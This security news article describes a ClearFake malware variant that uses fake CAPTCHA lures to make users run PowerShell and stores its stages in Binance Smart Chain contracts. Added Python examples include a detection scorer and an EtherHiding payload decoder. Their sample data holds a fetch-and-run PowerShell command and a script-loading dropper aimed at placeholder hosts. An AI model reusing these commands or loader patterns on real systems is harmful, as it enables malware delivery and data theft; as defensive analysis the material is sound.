ClearFake Variant Exploits Fake reCAPTCHA to Deliver Malicious PowerShell Code

A recent variant of the ClearFake malware framework has been identified that uses fake reCAPTCHA and Cloudflare Turnstile challenges to trick users into running malicious PowerShell commands themselves.

The change marks a notable escalation in the threat's capabilities, and the framework continues to abuse Web3 infrastructure, namely smart contracts on the Binance Smart Chain, as its delivery channel.

Technical Overview

ClearFake, first detected in July 2023, initially used a straightforward JavaScript injection technique on compromised websites to trick users into downloading fake browser updates.

However, by December 2024, it had incorporated new tactics, including fake reCAPTCHA and Cloudflare Turnstile verifications, to lure users into executing malicious PowerShell scripts.

The JavaScript stages that drive the infection are fetched from the Binance Smart Chain by calling smart contracts, which store obfuscated JavaScript code and the other resources the infection chain needs.

The malware's interaction with the Binance Smart Chain consists of loading several JavaScript stages and supporting resources, which fingerprint the victim's system.

It also downloads, decrypts, and displays the ClickFix lure, which is hosted on Cloudflare Pages.

The ClickFix tactic presents a fake error or verification message and instructs the user to run a PowerShell command to "fix" it, so the victim executes the attacker's command by hand.

According to Sekoia's report, these commands infect the user's system with malware such as Emmenhtal Loader and Lumma Stealer.
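Because the ClickFix lure has the victim paste the command into the Win+R Run dialog, the PowerShell process it spawns is a child of explorer.exe and typically carries a hidden window, an execution-policy bypass and a download-and-run cradle. The following scorer, an added example that is not code from the article or from Sekoia, applies those heuristics to a few constructed Sysmon-style process-creation records; the weights, the threshold and the placeholder URL are assumptions for the example, not published indicators.

```python
"""Score process-creation events for ClickFix-style PowerShell launches.

Added example, not code from the original article or from Sekoia. The
ClickFix lure has the victim paste a command into the Win+R Run dialog, so
the resulting PowerShell process is a child of explorer.exe and usually
carries a hidden window, an execution-policy bypass and a download-and-run
cradle. The events below are constructed Sysmon-style records (not real
telemetry); the weights and threshold are assumptions tuned to this sample.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _rx(pattern: str):
    """Case-insensitive 'is the pattern in the command line' predicate."""
    compiled = re.compile(pattern, re.I)
    return lambda e: compiled.search(e.command_line) is not None


# (name, predicate, weight). Short and long PowerShell switch spellings are
# both covered because lures mix them freely.
RULES = [
    ("run_dialog_parent", lambda e: e.parent_image.lower().endswith("\\explorer.exe"), 2),
    ("hidden_window", _rx(r"-(?:w|windowstyle)\s+h(?:idden)?\b"), 2),
    ("policy_bypass", _rx(r"-(?:ep|executionpolicy)\s+bypass\b"), 1),
    ("download_cradle", _rx(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b"), 2),
    ("invoke_expression", _rx(r"\b(?:iex|invoke-expression)\b"), 2),
    ("encoded_command", _rx(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), 2),
]


def score_event(event: ProcEvent):
    """Return (score, matched rule names); non-PowerShell images score 0."""
    exe = event.image.lower().rsplit("\\", 1)[-1]
    if exe not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    hits = [name for name, pred, _ in RULES if pred(event)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits


def flag_clickfix(events, threshold=5):
    """Indices of events whose score reaches the threshold."""
    return [i for i, e in enumerate(events) if score_event(e)[0] >= threshold]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample: one ClickFix-style launch, two benign PowerShell uses
# and one unrelated process. The URL is a placeholder, not an indicator.
SAMPLE_EVENTS = [
    ProcEvent(EXPLORER, PS,
              'powershell -w hidden -ep bypass -c "iex (irm https://verify.example/captcha)"'),
    ProcEvent(EXPLORER, PS, "powershell Get-Date"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcEvent(EXPLORER, r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, score_event(ev))
    print("flagged:", flag_clickfix(SAMPLE_EVENTS))
```

Only the first record reaches the threshold: an explorer.exe parent alone (a user typing `powershell` into Run) or a bypass flag alone (a scheduled admin script) is not enough, which keeps the rule from firing on routine use. In production the same logic maps onto Sysmon Event ID 1 or Windows 4688 fields (ParentImage/Image/CommandLine), and the RunMRU registry key of the user's hive corroborates that the command came from the Run dialog.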

Malware Delivery and Payloads

The latest ClearFake variant employs a technique known as EtherHiding, in which the malicious content is stored in smart contracts on the Binance Smart Chain and retrieved by the injected script with read-only contract calls.

Figure: Initial ClearFake script executed by the compromised website

This approach makes the malicious data effectively impossible to take down, since contract state cannot be removed the way a hosting server can; the attackers get a legitimate, publicly readable data store for hosting and distributing their payloads, and can swap in a new stage simply by writing new data to the contract.
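The retrieval side of EtherHiding, both the contract calls described under Technical Overview and the takedown-resistant storage described here, reduces to a read-only `eth_call` against a public RPC endpoint whose reply is an ABI-encoded string. The following script, an added example rather than code from the article or from ClearFake, builds that JSON-RPC request and decodes a constructed response; the contract address, selector, endpoint and JavaScript stage are placeholders, not real indicators.

```python
"""Read an EtherHiding-style payload out of a smart contract response.

Added example, not code from the article or from ClearFake. An EtherHiding
loader fetches its next stage with a read-only eth_call against a public RPC
endpoint: no transaction, no gas, and nothing to take down. The contract
returns the stored string ABI-encoded as a 32-byte offset, a 32-byte byte
length, then the UTF-8 bytes zero-padded to a 32-byte boundary. The contract
address, function selector, endpoint and JavaScript stage below are
constructed placeholders, not real indicators.
"""
import json

WORD = 32

# Hypothetical values. A real selector is the first 4 bytes of the Keccak-256
# hash of the function signature (not hashlib's sha3_256, which pads differently).
CONTRACT = "0x" + "ab" * 20
SELECTOR = "0x" + "11223344"
RPC_URL = "https://rpc.example/"  # placeholder; ClearFake targets public BSC endpoints


def build_eth_call(contract: str, selector: str, request_id: int = 1) -> str:
    """JSON-RPC body the loader POSTs to read the contract's stored string."""
    return json.dumps({
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector}, "latest"],
    })


def abi_encode_string(text: str) -> str:
    """ABI-encode a single `string` return value (used here only to build
    the constructed sample response)."""
    data = text.encode("utf-8")
    padding = (-len(data)) % WORD
    raw = (WORD.to_bytes(WORD, "big")
           + len(data).to_bytes(WORD, "big")
           + data + b"\x00" * padding)
    return "0x" + raw.hex()


def abi_decode_string(result_hex: str) -> str:
    """Decode an ABI-encoded `string` return value, validating the layout."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 2 * WORD:
        raise ValueError("too short for an ABI-encoded string")
    offset = int.from_bytes(raw[:WORD], "big")
    if offset + WORD > len(raw):
        raise ValueError("offset points past the end of the response")
    length = int.from_bytes(raw[offset:offset + WORD], "big")
    start = offset + WORD
    if start + length > len(raw):
        raise ValueError("declared length exceeds the response")
    return raw[start:start + length].decode("utf-8")


def extract_stage(rpc_response: str) -> str:
    """Pull the next-stage script out of a raw JSON-RPC reply. The loader
    would hand this string to eval(); here it is only returned."""
    reply = json.loads(rpc_response)
    if "error" in reply:
        raise RuntimeError(f"RPC error: {reply['error']}")
    return abi_decode_string(reply["result"])


# Constructed stage: a script-tag dropper of the kind a loader evaluates.
SAMPLE_STAGE = ('var s=document.createElement("script");'
                's.src="https://stage2.example/ld.js";'
                'document.head.appendChild(s);')
SAMPLE_RESPONSE = json.dumps({"jsonrpc": "2.0", "id": 1,
                              "result": abi_encode_string(SAMPLE_STAGE)})

if __name__ == "__main__":
    print("request:", build_eth_call(CONTRACT, SELECTOR))
    print("stage:", extract_stage(SAMPLE_RESPONSE))
```

The practical takeaway for defenders is the shape of the traffic: a browser on an ordinary website should not be POSTing `eth_call` bodies to blockchain RPC endpoints, and the hex the endpoint returns decodes to JavaScript rather than to a token balance. The decoder also guards against a malformed or truncated reply, which a loader that trusts the chain blindly would not.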

The framework has been observed distributing several payloads, including Emmenhtal Loader, which ultimately delivers Lumma Stealer, as well as Vidar Stealer.

Because the victim runs the PowerShell command themselves, no browser exploit or file download is needed, which sidesteps controls that key on downloaded executables and illustrates how the threat adapts to evade detection.

The ClearFake framework's reliance on blockchain technology for storing and serving malicious code cuts both ways.

It gives the attackers a takedown-resistant distribution method, but because the contracts and their data are public, other threat actors can read, copy or reuse the framework for their own purposes.

As of February 2025, ClearFake continues to evolve, with daily updates to its code and payloads, and remains an active, persistent threat.
